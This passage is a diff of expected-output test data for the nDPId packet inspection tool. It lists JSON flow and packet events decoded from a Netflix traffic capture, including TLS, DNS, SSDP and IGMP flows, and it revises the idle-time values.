+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1484319033680,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319033680,"pkt":"gCqoTGHM5JjWH70UCABFAAA0\/p1AAEAGd0DAqAEHNkXM8c9+AbvPvqpBvxwx6IAQEBW0wwAAAQEICh9kux6Fp1CV"} 
+00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319033631,"flow_last_seen":1484319033681,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1484319033681,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":148,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319033631,"flow_last_seen":1484319033734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1677,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1484319033734,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
+01369{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":149,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319033631,"flow_last_seen":1484319033735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3125,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319033735,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":165,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319033886,"flow_last_seen":1484319033886,"flow_idle_time":180000,"flow_min_l4_payload_len":122,"flow_max_l4_payload_len":122,"flow_tot_l4_payload_len":122,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1484319033886,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","src_port":53776,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1484319033886,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":164,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":164,"pkt_l4_len":130,"thread_ts_msec":1484319033886,"pkt":"AQBef\/\/65JjWH70UCABFAACWfwIAAAERiKvAqAEH7\/\/\/+tIQB2wAggqVTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMg0KU1Q6IHVybjptZHgtbmV0ZmxpeC1jb206c2VydmljZTp0YXJnZXQ6MA0KDQo="} 00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319033886,"flow_last_seen":1484319033886,"flow_idle_time":180000,"flow_min_l4_payload_len":122,"flow_max_l4_payload_len":122,"flow_tot_l4_payload_len":122,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1484319033886,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","src_port":53776,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319033943,"flow_last_seen":1484319033943,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319033943,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1484319033943,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319033943,"pkt":"gCqoTGHM5JjWH70UCABFAABAxzpAAEAGrpfAqAEHNkXM8c9\/Abtb3TwWAAAAALAC\/\/8tbQAAAgQFtAEDAwUBAQgKH2S8FwAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1484319033988,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319033988,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGjLY2RczxwKgBBwG7z39IJeEpW908F6ASRer4mgAAAgQFtAQCCAqFp1DiH2S8FwEDAwg="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1484319033990,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319033990,"pkt":"gCqoTGHM5JjWH70UCABFAAA0N8lAAEAGPhXAqAEHNkXM8c9\/Abtb3TwXSCXhKoAQEBVdDAAAAQEICh9kvEiFp1Di"} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319033943,"flow_last_seen":1484319033943,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319033943,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1484319033943,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319033943,"pkt":"gCqoTGHM5JjWH70UCABFAABAxzpAAEAGrpfAqAEHNkXM8c9\/Abtb3TwWAAAAALAC\/\/8tbQAAAgQFtAEDAwUBAQgKH2S8FwAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1484319033988,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319033988,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGjLY2RczxwKgBBwG7z39IJeEpW908F6ASRer4mgAAAgQFtAQCCAqFp1DiH2S8FwEDAwg="} 
+00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1484319033990,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319033990,"pkt":"gCqoTGHM5JjWH70UCABFAAA0N8lAAEAGPhXAqAEHNkXM8c9\/Abtb3TwXSCXhKoAQEBVdDAAAAQEICh9kvEiFp1Di"} 00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1484319033993,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1484319033993,"pkt":"AQBef\/\/65JjWH70UCABFAACZ8KEAAAERFwnAqAEH7\/\/\/+tIQB2wAhUYzTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMg0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQo="} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319033943,"flow_last_seen":1484319033997,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1484319033997,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
-00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319033943,"flow_last_seen":1484319034048,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1677,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1484319034048,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01370{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319033943,"flow_last_seen":1484319034049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3125,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319034049,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec 
Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}} +00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319033943,"flow_last_seen":1484319033997,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1484319033997,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319033943,"flow_last_seen":1484319034048,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1677,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1484319034048,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01370{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319033943,"flow_last_seen":1484319034049,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3125,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319034049,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}} 
00542{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":205,"source":"netflix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319034890,"flow_last_seen":1484319034890,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1484319034890,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"netflix.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1484319034890,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":60,"pkt_l4_len":8,"thread_ts_msec":1484319034890,"pkt":"AQBef\/\/65JjWH70UCABGAAAgKLUAAAECSnnAqAEH7\/\/\/+pQEAAAWAPoE7\/\/\/+gAAAAAAAAAAAAAAAAAA"} 00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"netflix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319034890,"flow_last_seen":1484319034890,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1484319034890,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
@@ -74,76 +74,76 @@ 00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"netflix.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319035004,"flow_last_seen":1484319035004,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1484319035004,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51949,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"api-global.latency.prodaa.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00681{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"netflix.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1484319035024,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1484319035024,"pkt":"5JjWH70UgCqoTGHMCABFAADT4UNAAEAR1X3AqAEBwKgBBwA1yu0AvyycGiGBgAABAAgAAAAACmFwaS1nbG9iYWwHbGF0ZW5jeQZwcm9kYWEHbmV0ZmxpeANjb20AAAEAAcAMAAEAAQAAADoABDRZJ4vADAABAAEAAAA6AAQ0KHEVwAwAAQABAAAAOgAENrvKVcAMAAEAAQAAADoABDQnzgXADAABAAEAAAA6AAQ2lKPwwAwAAQABAAAAOgAENrujrcAMAAEAAQAAADoABDQoEorADAABAAEAAAA6AAQ0KGy7"} 
00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":209,"source":"netflix.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319035004,"flow_last_seen":1484319035024,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1484319035024,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51949,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"api-global.latency.prodaa.netflix.com","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.89.39.139"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":213,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319035079,"flow_last_seen":1484319035079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319035079,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1484319035079,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319035079,"pkt":"gCqoTGHM5JjWH70UCABFAABAYJ9AAEAGvIXAqAEHNFkni8+MAbsc0sO0AAAAALAC\/\/+HyQAAAgQFtAEDAwUBAQgKH2TAbQAAAAAEAgAA"} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319035080,"flow_last_seen":1484319035080,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319035080,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1484319035080,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319035080,"pkt":"gCqoTGHM5JjWH70UCABFAABASDpAAEAG1OrAqAEHNFkni8+NAbuZGBE+AAAAALAC\/\/+99wAAAgQFtAEDAwUBAQgKH2TAbgAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1484319035129,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319035129,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGMwk0WSeLwKgBBwG7z4zl6UHQHNLDtaASReq0kAAAAgQFtAQCCAqtiMj8H2TAbQEDAwg="} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1484319035130,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319035130,"pkt":"gCqoTGHM5JjWH70UCABFAAA0gZlAAEAGm5fAqAEHNFkni8+MAbsc0sO15elB0YAQEBUZAAAAAQEICh9kwKCtiMj8"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1484319035130,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319035130,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGNAk0WSeLwKgBBwG7z40HBfk7mRgRP6ASReoSOAAAAgQFtAQCCAqtiMj8H2TAbgEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1484319035132,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319035132,"pkt":"gCqoTGHM5JjWH70UCABFAAA0YNFAAEAGvF\/AqAEHNFkni8+NAbuZGBE\/BwX5PIAQEBV2pwAAAQEICh9kwKGtiMj8"} -00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319035079,"flow_last_seen":1484319035134,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319035134,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": 
